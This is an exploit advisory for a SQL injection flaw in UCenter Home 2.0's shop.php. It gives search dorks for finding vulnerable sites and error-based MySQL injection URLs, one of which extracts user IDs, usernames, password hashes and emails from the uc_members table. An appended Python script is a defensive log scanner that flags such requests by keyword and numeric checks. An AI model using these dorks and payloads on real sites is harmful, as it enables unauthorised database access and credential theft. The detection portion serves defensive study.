__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: [email protected]
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.
Edit the DB name : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion and edit your SQL injection exploit.
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
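
Detection side of the request pattern described above, as an added example that is not part of the original advisory: it scans web-server access logs for shop.php?ac=view requests whose shopid is not a plain integer or carries the error-based SQL keywords. The log lines are constructed samples with the payload elided; the combined log format, the helper names and the rule that a legitimate shopid is purely numeric are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); payload body elided with "...".
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201'
    '%20from(select%20count(*),concat(...,floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a) HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /space.php?uid=4 HTTP/1.1" 200 2048',
]

# Client address and request target; the target may contain raw spaces.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[0-9.]+"')

# Substrings typical of the MySQL error-based technique named in the advisory.
MARKERS = ("information_schema", "floor(rand(", "group by", "concat(", "select")


def check_line(line):
    """Return (client, reasons) for a suspicious shop.php?ac=view request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    if not url.path.lower().endswith("/shop.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # also URL-decodes values
    if params.get("ac", [""])[0] != "view":
        return None
    reasons = []
    for value in params.get("shopid", []):
        if not re.fullmatch(r"[0-9]+", value):  # assumption: shop ids are plain integers
            reasons.append("non-numeric shopid")
        lowered = value.lower()
        reasons += [f"marker:{mk}" for mk in MARKERS if mk in lowered]
    return (client, reasons) if reasons else None


def scan(lines):
    """Return every suspicious hit found in an iterable of log lines."""
    return [hit for hit in map(check_line, lines) if hit]


if __name__ == "__main__":
    for client, reasons in scan(SAMPLE_LOG):
        print(client, ", ".join(reasons))
```

The non-numeric check alone catches the request even when an encoding hides the keywords; the markers only add context for triage.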